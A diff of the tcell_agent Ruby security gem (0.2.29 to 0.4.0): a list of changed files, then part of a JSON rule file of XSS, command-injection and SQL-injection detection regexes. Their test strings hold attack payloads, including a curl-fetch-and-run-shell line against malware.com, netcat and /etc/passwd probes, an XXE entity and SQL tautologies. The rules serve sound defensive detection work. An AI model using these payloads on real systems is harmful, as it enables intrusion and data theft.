tcell_agent 0.2.29 → 0.4.0

Files changed (100) hide show
  1. checksums.yaml +4 -4
  2. data/Readme.txt +7 -0
  3. data/bin/tcell_agent +9 -0
  4. data/lib/tcell_agent/agent/policy_manager.rb +3 -0
  5. data/lib/tcell_agent/agent/policy_types.rb +4 -1
  6. data/lib/tcell_agent/appsensor/injections_matcher.rb +20 -0
  7. data/lib/tcell_agent/appsensor/injections_reporter.rb +15 -56
  8. data/lib/tcell_agent/appsensor/meta_data.rb +56 -2
  9. data/lib/tcell_agent/appsensor/rules/baserules.json +371 -138
  10. data/lib/tcell_agent/cmdi.rb +113 -0
  11. data/lib/tcell_agent/config/unknown_options.rb +2 -0
  12. data/lib/tcell_agent/configuration.rb +30 -16
  13. data/lib/tcell_agent/hooks/login_fraud.rb +79 -0
  14. data/lib/tcell_agent/instrumentation.rb +6 -11
  15. data/lib/tcell_agent/patches/meta_data.rb +14 -11
  16. data/lib/tcell_agent/policies/appsensor/injection_sensor.rb +5 -9
  17. data/lib/tcell_agent/policies/appsensor_policy.rb +22 -206
  18. data/lib/tcell_agent/policies/clickjacking_policy.rb +4 -2
  19. data/lib/tcell_agent/policies/command_injection_policy.rb +196 -0
  20. data/lib/tcell_agent/policies/content_security_policy.rb +3 -2
  21. data/lib/tcell_agent/policies/dataloss_policy.rb +3 -1
  22. data/lib/tcell_agent/policies/honeytokens_policy.rb +3 -1
  23. data/lib/tcell_agent/policies/http_redirect_policy.rb +51 -37
  24. data/lib/tcell_agent/policies/http_tx_policy.rb +5 -1
  25. data/lib/tcell_agent/policies/login_fraud_policy.rb +6 -1
  26. data/lib/tcell_agent/policies/patches_policy.rb +3 -1
  27. data/lib/tcell_agent/policies/policy.rb +10 -0
  28. data/lib/tcell_agent/policies/secure_headers_policy.rb +5 -2
  29. data/lib/tcell_agent/rails/auth/devise.rb +12 -23
  30. data/lib/tcell_agent/rails/csrf_exception.rb +1 -1
  31. data/lib/tcell_agent/rails/dlp.rb +50 -54
  32. data/lib/tcell_agent/rails/middleware/body_filter_middleware.rb +0 -1
  33. data/lib/tcell_agent/rails/middleware/context_middleware.rb +0 -1
  34. data/lib/tcell_agent/rails/middleware/global_middleware.rb +0 -1
  35. data/lib/tcell_agent/rails/middleware/headers_middleware.rb +7 -10
  36. data/lib/tcell_agent/rails/on_start.rb +0 -1
  37. data/lib/tcell_agent/rails/tcell_body_proxy.rb +4 -4
  38. data/lib/tcell_agent/rails.rb +0 -2
  39. data/lib/tcell_agent/rust/libtcellagent-0.6.1.dylib +0 -0
  40. data/lib/tcell_agent/rust/libtcellagent-0.6.1.so +0 -0
  41. data/lib/tcell_agent/rust/models.rb +61 -0
  42. data/lib/tcell_agent/rust/tcellagent-0.6.1.dll +0 -0
  43. data/lib/tcell_agent/rust/whisperer.rb +112 -0
  44. data/lib/tcell_agent/sensor_events/appsensor_event.rb +25 -21
  45. data/lib/tcell_agent/sensor_events/appsensor_meta_event.rb +31 -24
  46. data/lib/tcell_agent/sensor_events/command_injection.rb +58 -0
  47. data/lib/tcell_agent/sensor_events/discovery.rb +1 -1
  48. data/lib/tcell_agent/sensor_events/login_fraud.rb +3 -13
  49. data/lib/tcell_agent/sensor_events/sensor.rb +81 -77
  50. data/lib/tcell_agent/sensor_events/util/sanitizer_utilities.rb +8 -0
  51. data/lib/tcell_agent/start_background_thread.rb +12 -3
  52. data/lib/tcell_agent/utils/io.rb +4 -1
  53. data/lib/tcell_agent/utils/params.rb +1 -0
  54. data/lib/tcell_agent/version.rb +1 -1
  55. data/lib/tcell_agent.rb +0 -1
  56. data/spec/lib/tcell_agent/appsensor/injections_matcher_spec.rb +27 -9
  57. data/spec/lib/tcell_agent/appsensor/injections_reporter_spec.rb +143 -193
  58. data/spec/lib/tcell_agent/appsensor/meta_data_spec.rb +67 -0
  59. data/spec/lib/tcell_agent/appsensor/rules/appsensor_rule_manager_spec.rb +0 -10
  60. data/spec/lib/tcell_agent/cmdi_spec.rb +748 -0
  61. data/spec/lib/tcell_agent/config/unknown_options_spec.rb +8 -0
  62. data/spec/lib/tcell_agent/configuration_spec.rb +138 -6
  63. data/spec/lib/tcell_agent/hooks/login_fraud_spec.rb +357 -0
  64. data/spec/lib/tcell_agent/patches/block_rule_spec.rb +70 -87
  65. data/spec/lib/tcell_agent/patches_spec.rb +9 -4
  66. data/spec/lib/tcell_agent/policies/appsensor/xss_sensor_spec.rb +186 -9
  67. data/spec/lib/tcell_agent/policies/appsensor_policy_spec.rb +309 -484
  68. data/spec/lib/tcell_agent/policies/command_injection_policy_spec.rb +736 -0
  69. data/spec/lib/tcell_agent/policies/http_redirect_policy_spec.rb +222 -41
  70. data/spec/lib/tcell_agent/policies/patches_policy_spec.rb +56 -32
  71. data/spec/lib/tcell_agent/rails/middleware/appsensor_middleware_spec.rb +161 -85
  72. data/spec/lib/tcell_agent/rails/middleware/tcell_body_proxy_spec.rb +40 -72
  73. data/spec/lib/tcell_agent/rust/whisperer_spec.rb +267 -0
  74. data/spec/lib/tcell_agent/sensor_events/appsensor_meta_event_spec.rb +20 -15
  75. data/spec/spec_helper.rb +0 -9
  76. data/tcell_agent.gemspec +8 -3
  77. metadata +40 -39
  78. data/lib/tcell_agent/appsensor/sensor.rb +0 -52
  79. data/lib/tcell_agent/policies/appsensor/database_sensor.rb +0 -56
  80. data/lib/tcell_agent/policies/appsensor/misc_sensor.rb +0 -59
  81. data/lib/tcell_agent/policies/appsensor/payloads_policy.rb +0 -150
  82. data/lib/tcell_agent/policies/appsensor/request_size_sensor.rb +0 -25
  83. data/lib/tcell_agent/policies/appsensor/response_codes_sensor.rb +0 -73
  84. data/lib/tcell_agent/policies/appsensor/response_size_sensor.rb +0 -25
  85. data/lib/tcell_agent/policies/appsensor/size_sensor.rb +0 -71
  86. data/lib/tcell_agent/policies/appsensor/user_agent_sensor.rb +0 -47
  87. data/lib/tcell_agent/rails/auth/hooks.rb +0 -79
  88. data/lib/tcell_agent/sensor_events/util/redirect_utils.rb +0 -22
  89. data/spec/lib/tcell_agent/policies/appsensor/database_sensor_spec.rb +0 -165
  90. data/spec/lib/tcell_agent/policies/appsensor/misc_sensor_spec.rb +0 -429
  91. data/spec/lib/tcell_agent/policies/appsensor/payloads_policy_apply_spec.rb +0 -466
  92. data/spec/lib/tcell_agent/policies/appsensor/payloads_policy_from_json_spec.rb +0 -890
  93. data/spec/lib/tcell_agent/policies/appsensor/payloads_policy_log_spec.rb +0 -417
  94. data/spec/lib/tcell_agent/policies/appsensor/request_size_sensor_spec.rb +0 -236
  95. data/spec/lib/tcell_agent/policies/appsensor/response_codes_sensor_spec.rb +0 -297
  96. data/spec/lib/tcell_agent/policies/appsensor/response_size_sensor_spec.rb +0 -241
  97. data/spec/lib/tcell_agent/policies/appsensor/user_agent_sensor_spec.rb +0 -172
  98. data/spec/lib/tcell_agent/rails/auth/hooks_spec.rb +0 -246
  99. data/spec/lib/tcell_agent/sensor_events/util/redirect_utils_spec.rb +0 -25
  100. data/spec/support/resources/baserules.json +0 -155
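--- a/data/lib/tcell_agent/appsensor/rules/baserules.json
+++ b/data/lib/tcell_agent/appsensor/rules/baserules.json
@@ -1,231 +1,464 @@
  {
- "version":"20160516",
- "sensors":{
- "xss":{
- "patterns":[
+ "version": "20171205",
+ "sensors": {
+ "xss": {
+ "patterns": [
  {
- "title":"Basic Injection",
- "sophistication":1,
+ "title": "Basic Injection",
+ "sophistication": 1,
  "common": "(?:<(script|iframe|embed|frame|frameset|object|img|applet|body|html|style|layer|link|ilayer|meta|bgsound))",
  "tests": {
- "shouldFind":["\n\n<scRipT>document.write(1)</script>","<body onload=\"abc\">","<script>alert(123)</script>","<script>alert(\"hellox world\");</script>","9<script/src=http/attacker.com>"],
- "shouldIgnore":["<h1>hi</h1>","Bob","Script"]
+ "shouldFind": [
+ "\n\n<scRipT>document.write(1)</script>",
+ "<body onload=\"abc\">",
+ "<script>alert(123)</script>",
+ "<script>alert(\"hellox world\");</script>",
+ "9<script/src=http/attacker.com>"
+ ],
+ "shouldIgnore": [
+ "<h1>hi</h1>",
+ "Bob",
+ "Script"
+ ]
  },
  "id": "1"
  },
  {
- "title":"Alert or Event XSS",
- "sophistication":2,
- "common": "(?:(alert|on\\w+|function\\s+\\w+)\\s*\\(\\s*(['+\\d\\w](,?\\s*['+\\d\\w]*)*)*\\s*\\))",
- "tests":{
- "shouldFind":["<input onmouseover='alert(1)'>","<input/onmouseover='alert(1)'>"],
- "shouldIgnore":["<h1>hi</h1>","Bob","Sammy"]
+ "title": "Alert or Event XSS",
+ "sophistication": 2,
+ "common": "(?:(alert|on\\w+\\s*=|function\\s+\\w+)\\s*\\(\\s*(['+\\d\\w](,?\\s*['+\\d\\w]*)*)*\\s*\\))",
+ "tests": {
+ "shouldFind": [
+ "<input onmouseover='alert(1)'>",
+ "<input/onmouseover='alert(1)'>"
+ ],
+ "shouldIgnore": [
+ "Email de la personne (action du front)",
+ "<h1>hi</h1>",
+ "()",
+ "Bob",
+ "Sammy"
+ ]
  },
  "id": "2"
  },
  {
- "title":"Attribute Breaks",
- "sophistication":3,
- "common": "(?:\\\"+.*[<=]\\s*\\\"[^\\\"]+\\\")|(?:\\\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\\\"\\s]*>)|(?:\\\"\\s*(?:src|style|on\\w+)\\s*=\\s*\\\")|(?:[^\\\"]?\\\"[,;\\s]+\\w*[\\[\\(])(?:^>[\\w\\s]*<\\/?\\w{2,}>)",
- "tests":{
- "shouldFind":["<input src=\"b\" onmouseover=\"alert(1)\" test=\"abc\">"],
- "shouldIgnore":["<h1>hi</h1>","<i class=\"test\">test</i>","Bob","Sammy","<i>","onmouseover","\"alert(1)\""]
- },
- "id": "4"
+ "title": "Attribute Breaks",
+ "sophistication": 3,
+ "common": "(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])(?:^>[\\w\\s]*</?\\w{2,}>)",
+ "tests": {
+ "shouldFind": [
+ "<input src=\"b\" onmouseover=\"alert(1)\" test=\"abc\">"
+ ],
+ "shouldIgnore": [
+ "<h1>hi</h1>",
+ "<i class=\"test\">test</i>",
+ "Bob",
+ "Sammy",
+ "<i>",
+ "onmouseover",
+ "\"alert(1)\""
+ ]
+ },
+ "id": "4"
  },
  {
- "title":"Basic Obfuscation",
- "sophistication":3,
- "common": "(?:[\\\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\\\"])|(?:\\/[\\w\\s]+\\/\\.)|(?:=\\s*\\/\\w+\\/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\\\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])",
- "tests": {
- "shouldFind":[",YAHOO.util.Get.script(\"http://ha.ckers.org/xss.js\")"],
- "shouldIgnore":["<h1>hi</h1>","<i class=\"test\">test</i>","Bob","Sammy","<i>","onmouseover","\"alert(1)\""]
- },
- "id": "5"
+ "title": "Basic Obfuscation",
+ "sophistication": 3,
+ "common": "(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:/[\\w\\s]+/\\.)|(?:=\\s*/\\w+/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])",
+ "tests": {
+ "shouldFind": [
+ ",YAHOO.util.Get.script(\"http://ha.ckers.org/xss.js\")"
+ ],
+ "shouldIgnore": [
+ "<h1>hi</h1>",
+ "<i class=\"test\">test</i>",
+ "Bob",
+ "Sammy",
+ "<i>",
+ "onmouseover",
+ "\"alert(1)\""
+ ]
+ },
+ "id": "5"
  },
  {
- "title":"Common Concatenation",
- "sophistication":3,
- "common": "(?:=\\s*\\w+\\s*\\+\\s*\\\")|(?:\\+=\\s*\\(\\s\\\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[s*\\])|(?:\\\"\\s*\\+\\s*\\\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\\\"\\s*[&|]+\\s*\\\")|(?:\\/\\s*\\?\\s*\\\")|(?:\\/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:\\]\\s*\\[\\W*\\w)|(?:[^\\s]\\s*=\\s*\\/)",
- "tests": {
- "shouldFind":["= werewr + \""],
- "shouldIgnore":["<h1>hi</h1>","<i class=\"test\">test</i>","Bob","Sammy","<i>","onmouseover","\"alert(1)\""]
- },
- "id": "6"
+ "title": "Common Concatenation",
+ "sophistication": 3,
+ "common": "(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[\\s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:/\\s*\\?\\s*\")|(?:/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:\\]\\s*\\[\\W*\\w)",
+ "tests": {
+ "shouldFind": [
+ "=a+\"",
+ "+=( \"",
+ "! 1,000.0a?",
+ "= [ ]",
+ "\" + \"",
+ "#[ 1 ] ;",
+ "^[ 1 ] +",
+ "\" & \"",
+ "\" || \"",
+ "/ ? \"",
+ "/ ) [",
+ "1?a:1",
+ "] [$a",
+ "= werewr + \""
+ ],
+ "shouldIgnore": [
+ "<h1>hi</h1>",
+ "<i class=\"test\">test</i>",
+ "Bob",
+ "Sammy",
+ "<i>",
+ "onmouseover",
+ "http://127.0.0.1:4000/contrib?file=/etc/passwd",
+ "e=/",
+ "\"alert(1)\""
+ ]
+ },
+ "id": "6"
  },
  {
- "title":"IFrame Tag Injection",
- "sophistication":1,
+ "title": "IFrame Tag Injection",
+ "sophistication": 1,
  "common": "<iframe.*",
  "tests": {
- "shouldFind":["Sam\n<h3><iframe/src=\\\\malware.xcc/>"],
- "shouldIgnore":["<h1>hi</h1>","Bob","Script"]
+ "shouldFind": [
+ "Sam\n<h3><iframe/src=\\\\malware.xcc/>"
+ ],
+ "shouldIgnore": [
+ "<h1>hi</h1>",
+ "Bob",
+ "Script"
+ ]
  },
  "id": "7"
  },
  {
- "title":"JavaScript URL",
- "sophistication":1,
+ "title": "JavaScript URL",
+ "sophistication": 1,
  "common": "\\b(src|href|lowsrc|url|content)\\b\\W*?\\bjavascript:",
  "tests": {
- "shouldFind":["\" href=\"javascript:alert(1)\"","' url='javascript:alert(1)'","<input type=image src=javascript:","<meta http-equiv=\"refresh\" content=\"javascript:..."],
- "shouldIgnore":["<h1>hi</h1>","Bob","Script"]
+ "shouldFind": [
+ "\" href=\"javascript:alert(1)\"",
+ "' url='javascript:alert(1)'",
+ "<input type=image src=javascript:",
+ "<meta http-equiv=\"refresh\" content=\"javascript:..."
+ ],
+ "shouldIgnore": [
+ "<h1>hi</h1>",
+ "Bob",
+ "Script"
+ ]
  },
  "id": "8"
-
-
  }
  ]
  },
- "cmdi":{
- "safe_pattern":"^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
- "patterns":[
+ "cmdi": {
+ "safe_pattern": "^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
+ "patterns": [
+ {
+ "title": "Common Remote Attempts",
+ "sophistication": 2,
+ "id": "1",
+ "common": "(?:[;\\|`]\\W*?\\bcc|[&\\|;]\\W*\\b\\b(wget|curl))\\b|/cc(?:['\"\\|;`\\-\\s]|$)",
+ "tests": {
+ "shouldFind": [
+ "|wget https://malware.com",
+ "& curl https://malware.com/run_me.sh|sh"
+ ],
+ "shouldIgnore": [
+ "curl/7.54.0",
+ "Wget/1.17.1 (linux-gnu)",
+ "aB--D_C=",
+ "union soldier",
+ "a",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2",
+ "divide and conquer"
+ ]
+ }
+ },
  {
- "title":"Common Remote Attempts",
- "sophistication":2,
- "id":"1",
- "common":"(?:[\\;\\|\\`]\\W*?\\bcc|\\b(wget|curl))\\b|\\/cc(?:[\\'\\\"\\|\\;\\`\\-\\s]|$)",
+ "title": "Common Command Attempts",
+ "sophistication": 1,
+ "id": "2",
+ "common": "(?:\\b(?:(?:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe)|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo\\b\\W*?\\by+)\\b|c(?:md(?:(?:\\.exe|32)\\b|\\b\\W*?/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[;\\|`]\\W*?\\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp)|p(?:asswd|ython|erl|ing|s)|ruby|node|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\\b|g(?:\\+\\+|cc\b)))",
  "tests": {
- "shouldFind":["|wget https://malware.com"],
- "shouldIgnore":["aB--D_C=","union soldier", "a", "select", "James O'Connor", "Like this or that", "divide and conquer"]
+ "shouldFind": [
+ "test|echo hi",
+ "abc;nc",
+ "`ls /etc/passwd`",
+ "`python /my/code`",
+ "`ruby /my/code`",
+ "`node /my/code`"
+ ],
+ "shouldIgnore": [
+ "aB--D_C=",
+ "union soldier",
+ "a",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "divide and conquer",
+ "david;bob",
+ "python",
+ "ruby",
+ "node"
+ ]
  }
  },
  {
- "title":"Common Command Attempts",
- "sophistication":1,
- "id":"2",
- "common":"(?:\\b(?:(?:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe)|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo\\b\\W*?\\by+)\\b|c(?:md(?:(?:\\.exe|32)\\b|\\b\\W*?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*?\\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\\b|g(?:\\+\\+|cc\b)))",
+ "title": "XML Injection Attempts",
+ "sophistication": 1,
+ "id": "3",
+ "common": "<\\?xml.*<!ENTITY",
  "tests": {
- "shouldFind":["test|echo hi","abc;nc","`ls /etc/passwd`"],
- "shouldIgnore":["aB--D_C=","union soldier", "a", "select", "James O'Connor", "Like this or that", "divide and conquer","david;bob"]
+ "shouldFind": [
+ "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM \"file:///dev/random\" >]><foo>&xxe;</foo>"
+ ],
+ "shouldIgnore": [
+ "aB--D_C=",
+ "union soldier",
+ "a",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "divide and conquer",
+ "david;bob",
+ "python",
+ "ruby",
+ "node"
+ ]
  }
  }
  ]
  },
- "sqli":{
- "safe_pattern":"^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
- "patterns":[
+ "sqli": {
+ "safe_pattern": "^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
+ "patterns": [
  {
- "title":"Common Encoding Obfuscations",
- "sophistication":3,
- "common": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))","common": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))",
- "java": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|\\{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))","common": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|\\{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))",
+ "title": "Common Encoding Obfuscations",
+ "sophistication": 3,
+ "common": "(?:(?:\\d[\"'`\u00b4\u2019\u2018]\\s+[\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\"'`\u00b4\u2019\u2018]|(/\\*)+[\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|/\\*|\\{)?)|(?:[\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\"'`\u00b4\u2019\u2018(].*?$)|(?:[\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\"'`\u00b4\u2019\u2018][<>~]+[\"'`\u00b4\u2019\u2018]))",
  "tests": {
- "shouldFind":["') or ('1'='1--","') or ('1'='1--","1 OR '1'!=0","aa' LIKE md5(1) or '1"],
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
+ "shouldFind": [
+ "') or ('1'='1--",
+ "') or ('1'='1--",
+ "1 OR '1'!=0",
+ "aa' LIKE md5(1) or '1"
+ ],
+ "shouldIgnore": [
+ "aB--D_C=",
+ "union soldier",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "divide and conquer"
+ ]
  },
  "id": "1"
  },
  {
- "title":"Common Probes/Executions",
- "sophistication":1,
- "common": "\\b(?:having)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=<>]|(?:\\bexecute(\\s{1,5}[\\w\\.$]{1,5}\\s{0,3})?\\()|\\bhaving\\b ?(?:\\d{1,10}|[\\'\\\"][^=]{1,10}[\\'\\\"]) ?[=<>]+|(?:\\bcreate\\s+?table.{0,20}?\\()|(?:\\blike\\W*?char\\W*?\\()|(?:(?:(select(.*?)case|from(.*?)limit|order\\sby)))|exists\\s(\\sselect|select\\Sif(null)?\\s\\(|select\\Stop|select\\Sconcat|system\\s\\(|\\b(?:having)\\b\\s+(\\d{1,10})|'[^=]{1,10}')",
+ "title": "Common Probes/Executions",
+ "sophistication": 1,
+ "common": "\\b(?:having)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=<>]|(?:\\bexecute(\\s{1,5}[\\w\\.$]{1,5}\\s{0,3})?\\()|\\bhaving\\b ?(?:\\d{1,10}|['\"][^=]{1,10}['\"]) ?[=<>]+|(?:\\bcreate\\s+?table.{0,20}?\\()|(?:\\blike\\W*?char\\W*?\\()|(?:(?:(select(.*?)case|from(.*?)limit|order\\sby)))|exists\\s(\\sselect|select\\Sif(null)?\\s\\(|select\\Stop|select\\Sconcat|system\\s\\(|\\b(?:having)\\b\\s+(\\d{1,10})|'[^=]{1,10}')",
  "id": "2"
  },
  {
- "title":"Conditional Attempts",
- "sophistication":3,
+ "title": "Conditional Attempts",
+ "sophistication": 3,
  "common": "(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])",
  "tests": {
- "shouldFind":["' or id= 1 having 1 #1 !"],
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
+ "shouldFind": [
+ "' or id= 1 having 1 #1 !"
+ ],
+ "shouldIgnore": [
+ "aB--D_C=",
+ "union soldier",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "divide and conquer"
+ ]
  },
  "id": "7"
  },
  {
- "title":"Union Attempts",
- "sophistication":3,
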